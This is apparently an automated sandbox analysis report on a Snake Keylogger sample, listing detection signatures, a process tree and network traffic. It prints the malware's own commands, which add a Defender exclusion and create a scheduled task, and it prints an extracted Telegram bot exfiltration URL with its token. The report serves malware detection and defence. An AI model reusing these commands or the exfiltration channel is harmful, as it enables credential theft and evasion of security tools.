Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1583466
MD5:92e84c83303cdc492eaaed0e1e4b79c6
SHA1:ce2f5255abed1a4b241ecdd627f6d247594904ae
SHA256:82107247e3738a1675cf511dd4c051fb438dd1a973171318e960b406246fcf93
Tags:NETexeMSILSnakeKeyloggeruser-jstrosch
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Snake Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 3752 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 92E84C83303CDC492EAAED0E1E4B79C6)
    • powershell.exe (PID: 6528 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aVmZDnwW.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7416 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 5452 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmp9FE1.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7276 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • cmd.exe (PID: 7768 cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • choice.exe (PID: 7824 cmdline: choice /C Y /N /D Y /T 3 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • aVmZDnwW.exe (PID: 7328 cmdline: C:\Users\user\AppData\Roaming\aVmZDnwW.exe MD5: 92E84C83303CDC492EAAED0E1E4B79C6)
    • schtasks.exe (PID: 7576 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmpB1B3.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7620 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • cmd.exe (PID: 7896 cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • choice.exe (PID: 7964 cmdline: choice /C Y /N /D Y /T 3 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7822875840:AAE1dEB39_r2yuQHwPOz--iI8ECcmIivnQs/sendMessage?chat_id=7342994424", "Token": "7822875840:AAE1dEB39_r2yuQHwPOz--iI8ECcmIivnQs", "Chat_id": "7342994424", "Version": "5.1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
      • 0x14968:$a1: get_encryptedPassword
      • 0x14c54:$a2: get_encryptedUsername
      • 0x14774:$a3: get_timePasswordChanged
      • 0x1486f:$a4: get_passwordField
      • 0x1497e:$a5: set_encryptedPassword
      • 0x15fe3:$a7: get_logins
      • 0x15f46:$a10: KeyLoggerEventArgs
      • 0x15bb1:$a11: KeyLoggerEventArgsEventHandler
      00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
      • 0x19974:$x1: $%SMTPDV$
      • 0x18358:$x2: $#TheHashHere%&
      • 0x1991c:$x3: %FTPDV$
      • 0x182f8:$x4: $%TelegramDv$
      • 0x15bb1:$x5: KeyLoggerEventArgs
      • 0x15f46:$x5: KeyLoggerEventArgs
      • 0x19940:$m2: Clipboard Logs ID
      • 0x19b7e:$m2: Screenshot Logs ID
      • 0x19c8e:$m2: keystroke Logs ID
      • 0x19f68:$m3: SnakePW
      • 0x19b56:$m4: \SnakeKeylogger\
      00000008.00000002.2233081731.0000000004118000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Click to see the 24 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        7.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          7.2.RegSvcs.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
            7.2.RegSvcs.exe.400000.0.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
              7.2.RegSvcs.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
              • 0x14b68:$a1: get_encryptedPassword
              • 0x14e54:$a2: get_encryptedUsername
              • 0x14974:$a3: get_timePasswordChanged
              • 0x14a6f:$a4: get_passwordField
              • 0x14b7e:$a5: set_encryptedPassword
              • 0x161e3:$a7: get_logins
              • 0x16146:$a10: KeyLoggerEventArgs
              • 0x15db1:$a11: KeyLoggerEventArgsEventHandler
              7.2.RegSvcs.exe.400000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
              • 0x1c53c:$a2: \Comodo\Dragon\User Data\Default\Login Data
              • 0x1b76e:$a3: \Google\Chrome\User Data\Default\Login Data
              • 0x1bba1:$a4: \Orbitum\User Data\Default\Login Data
              • 0x1cbe0:$a5: \Kometa\User Data\Default\Login Data
              Click to see the 52 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aVmZDnwW.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aVmZDnwW.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 3752, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aVmZDnwW.exe", ProcessId: 6528, ProcessName: powershell.exe
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aVmZDnwW.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aVmZDnwW.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 3752, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aVmZDnwW.exe", ProcessId: 6528, ProcessName: powershell.exe
              Sigma detected: Suspicious Add Scheduled Task Parent
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmpB1B3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmpB1B3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\aVmZDnwW.exe, ParentImage: C:\Users\user\AppData\Roaming\aVmZDnwW.exe, ParentProcessId: 7328, ParentProcessName: aVmZDnwW.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmpB1B3.tmp", ProcessId: 7576, ProcessName: schtasks.exe
              Sigma detected: Suspicious Schtasks From Env Var Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmp9FE1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmp9FE1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 3752, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmp9FE1.tmp", ProcessId: 5452, ProcessName: schtasks.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aVmZDnwW.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aVmZDnwW.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 3752, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aVmZDnwW.exe", ProcessId: 6528, ProcessName: powershell.exe

              Persistence and Installation Behavior

              barindex
              Sigma detected: Scheduled temp file as task from temp location
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmp9FE1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmp9FE1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 3752, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmp9FE1.tmp", ProcessId: 5452, ProcessName: schtasks.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-02T20:19:47.624321+010028033053Unknown Traffic192.168.2.549728188.114.97.3443TCP
              2025-01-02T20:19:51.758223+010028033053Unknown Traffic192.168.2.549744188.114.97.3443TCP
              2025-01-02T20:19:52.688347+010028033053Unknown Traffic192.168.2.549752188.114.97.3443TCP
              2025-01-02T20:19:56.799969+010028033053Unknown Traffic192.168.2.549790188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-02T20:19:45.728728+010028032742Potentially Bad Traffic192.168.2.549724193.122.130.080TCP
              2025-01-02T20:19:47.151066+010028032742Potentially Bad Traffic192.168.2.549724193.122.130.080TCP
              2025-01-02T20:19:48.244406+010028032742Potentially Bad Traffic192.168.2.549729193.122.130.080TCP
              2025-01-02T20:19:49.494395+010028032742Potentially Bad Traffic192.168.2.549732193.122.130.080TCP
              2025-01-02T20:19:50.244444+010028032742Potentially Bad Traffic192.168.2.549734193.122.130.080TCP
              2025-01-02T20:19:50.619445+010028032742Potentially Bad Traffic192.168.2.549736193.122.130.080TCP
              2025-01-02T20:19:51.166282+010028032742Potentially Bad Traffic192.168.2.549734193.122.130.080TCP
              2025-01-02T20:19:52.385016+010028032742Potentially Bad Traffic192.168.2.549750193.122.130.080TCP
              2025-01-02T20:19:53.510035+010028032742Potentially Bad Traffic192.168.2.549761193.122.130.080TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7822875840:AAE1dEB39_r2yuQHwPOz--iI8ECcmIivnQs/sendMessage?chat_id=7342994424", "Token": "7822875840:AAE1dEB39_r2yuQHwPOz--iI8ECcmIivnQs", "Chat_id": "7342994424", "Version": "5.1"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeReversingLabs: Detection: 71%
              Multi AV Scanner detection for submitted file
              Source: file.exeReversingLabs: Detection: 71%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected

              Location Tracking

              barindex
              Tries to detect the country of the analysis system (by using the IP)
              Source: unknownDNS query: name: reallyfreegeoip.org

              Compliance

              barindex
              Detected unpacking (overwrites its own PE header)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.510000.0.unpack
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49725 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49737 version: TLS 1.0
              Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]0_2_029AD208
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]0_2_029AB09C
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 0998A6F4h0_2_0998A92B
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h0_2_0A0A2288
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h0_2_0A0A5FAF
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then xor edx, edx0_2_0A0A6374
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then xor edx, edx0_2_0A0A6380
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 4x nop then jmp 09DB95DCh8_2_09DB9813

              Networking

              barindex
              Yara detected Generic Downloader
              Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.44d29e8.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.446dbc8.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.4408da8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.aVmZDnwW.exe.41c3878.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.aVmZDnwW.exe.411c690.3.raw.unpack, type: UNPACKEDPE
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49729 -> 193.122.130.0:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49750 -> 193.122.130.0:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49761 -> 193.122.130.0:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49736 -> 193.122.130.0:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49734 -> 193.122.130.0:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49732 -> 193.122.130.0:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49724 -> 193.122.130.0:80
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49744 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49728 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49752 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49790 -> 188.114.97.3:443
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49725 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49737 version: TLS 1.0
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
